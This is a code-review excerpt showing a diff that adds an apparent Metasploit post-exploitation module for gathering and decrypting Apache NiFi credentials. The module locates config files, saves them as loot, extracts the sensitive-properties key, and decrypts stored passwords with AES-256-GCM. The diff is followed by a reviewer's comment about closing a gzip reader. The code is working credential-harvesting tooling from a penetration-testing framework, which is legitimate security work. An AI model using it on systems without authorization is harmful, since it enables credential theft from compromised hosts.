modules/post/linux/gather/nifi_credentials.rb

```diff
@@ -0,0 +1,298 @@
+      unless readable? f
+        vprint_bad("#{f} not readable")
+        next
+      end
+      print_good("#{f} is readable!")
+      @identity_file = f
+    end
+    @identity_file
+  end
+
+  def properties_file
+    return @properties_file if @properties_file
+
+    [datastore['NIFI_PROPERTIES'], "#{datastore['NIFI_PATH']}/conf/nifi.properties"].each do |f|
+      unless file_exist? f
+        vprint_bad("#{f} not found")
+        next
+      end
+      vprint_status("Found nifi.properties file #{f}")
+      unless readable? f
+        vprint_bad("#{f} not readable")
+        next
+      end
+      print_good("#{f} is readable!")
+      @properties_file = f
+    end
+    @properties_file
+  end
+
+  def flow_file
+    return @flow_file if @flow_file
+
+    [datastore['NIFI_FLOW_JSON'], "#{datastore['NIFI_PATH']}/conf/flow.json.gz"].each do |f|
+      unless file_exist? f
+        vprint_bad("#{f} not found")
+        next
+      end
+      vprint_status("Found flow.json.gz file #{f}")
+      unless readable? f
+        vprint_bad("#{f} not readable")
+        next
+      end
+      print_good("#{f} is readable!")
+      @flow_file = f
+    end
+    @flow_file
+  end
+
+  def salt
+    'NiFi Static Salt'
+  end
+
+  def decrypt(ciphertext, auth_tag, key, nonce)
+    vprint_status("Nonce: #{nonce}")
+    vprint_status("Auth Tag: #{auth_tag}")
+    vprint_status("Ciphertext: #{ciphertext}")
+    cipher = OpenSSL::Cipher.new('AES-256-GCM')
+    cipher.decrypt
+    cipher.key = key
+    cipher.iv_len = 16
+    cipher.iv = [nonce].pack('H*')
+    cipher.auth_tag = [auth_tag].pack('H*')
+
+    decrypted_text = cipher.update([ciphertext].pack('H*'))
+    decrypted_text << cipher.final
+    decrypted_text
+  end
+
+  def clean_enc_string(password)
+    password[4, password.length - 5] # remove enc{ at the beginning and } at the end
+  end
+
+  def run
+    unless ((flow_file && properties_file) || identity_file)
+      fail_with(Failure::NotFound, 'Unable to find login-identity-providers.xml, nifi.properties and/or flow.json.gz files')
+    end
+
+    properties = read_file(properties_file)
+    path = store_loot('nifi.properties', 'text/plain', session, properties, 'nifi.properties', 'nifi properties file')
+    print_good("properties data saved in: #{path}")
+    key = properties.scan(/^nifi.sensitive.props.key=(.+)$/).flatten.first.strip
+    fail_with(Failure::NotFound, 'Unable to find nifi.properties and/or flow.json.gz files') if key.nil?
+    print_good("Key: #{key}")
+    algorithm = properties.scan(/^nifi.sensitive.props.algorithm=(\w+)$/).flatten.first.strip
+    fail_with(Failure::NotFound, 'Unable to find nifi.properties and/or flow.json.gz files') if algorithm.nil?
+
+    columns = ['Name', 'Username', 'Password', 'Information']
+    table = Rex::Text::Table.new('Header' => 'NiFi Flow Data', 'Indent' => 1, 'Columns' => columns)
+
+    gz = Zlib::GzipReader.new(StringIO.new(read_file(flow_file)))
```

Comment:
Is it possible to use the block form of this method call so it closes the gzip reader etc properly for you?

https://ruby-doc.org/stdlib-2.4.0/libdoc/zlib/rdoc/Zlib/GzipReader.html